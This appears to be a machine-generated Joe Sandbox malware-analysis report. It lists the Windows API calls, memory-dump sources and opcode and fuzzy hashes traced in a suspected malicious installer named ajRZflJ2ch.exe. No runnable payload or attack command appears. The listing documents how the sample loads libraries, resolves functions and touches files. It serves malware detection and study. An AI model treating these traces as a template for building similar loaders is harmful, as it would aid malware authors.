                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A$Call
                                                                                                            • API String ID: 2624150263-413618503
                                                                                                            • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            APIs
                                                                                                              • Part of subcall function 7013121B: GlobalAlloc.KERNELBASE(00000040,?,7013123B,?,701312DF,00000019,701311BE,-000000A0), ref: 70131225
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70131C6B
                                                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 70131CB3
                                                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 70131CBD
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70131CD0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70131DB2
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70131DB7
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70131DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70131FA6
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 70132140
                                                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 701321B5
                                                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 701321C6
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 70132220
                                                                                                            • lstrlenW.KERNEL32(00000808), ref: 7013223A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2274084322.0000000070131000.00000020.00000001.01000000.00000004.sdmp, Offset: 70130000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2273940310.0000000070130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274182585.0000000070134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274265618.0000000070136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70130000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 245916457-0
                                                                                                            • Opcode ID: fa3c3ea0ee5d030bace19f789ffdac8e33f8bf73b1128b7f9c456312fdd34431
                                                                                                            • Instruction ID: 147407af022e78acae9b99ffaf00773b6bfb98fef1778cf85a6173ad1f53553f
                                                                                                            • Opcode Fuzzy Hash: fa3c3ea0ee5d030bace19f789ffdac8e33f8bf73b1128b7f9c456312fdd34431
                                                                                                            • Instruction Fuzzy Hash: 7C22BC71D00206DFCB26DFA4C9846EEFBF9FB05315FA2456EE166E3680D7B05A848B50
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID:
                                                                                                            • API String ID: 542301482-0
                                                                                                            • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                            • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                            • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: Call$N
                                                                                                            • API String ID: 3103080414-3438112850
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ajRZflJ2ch.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-2246974252
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,0000247D), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
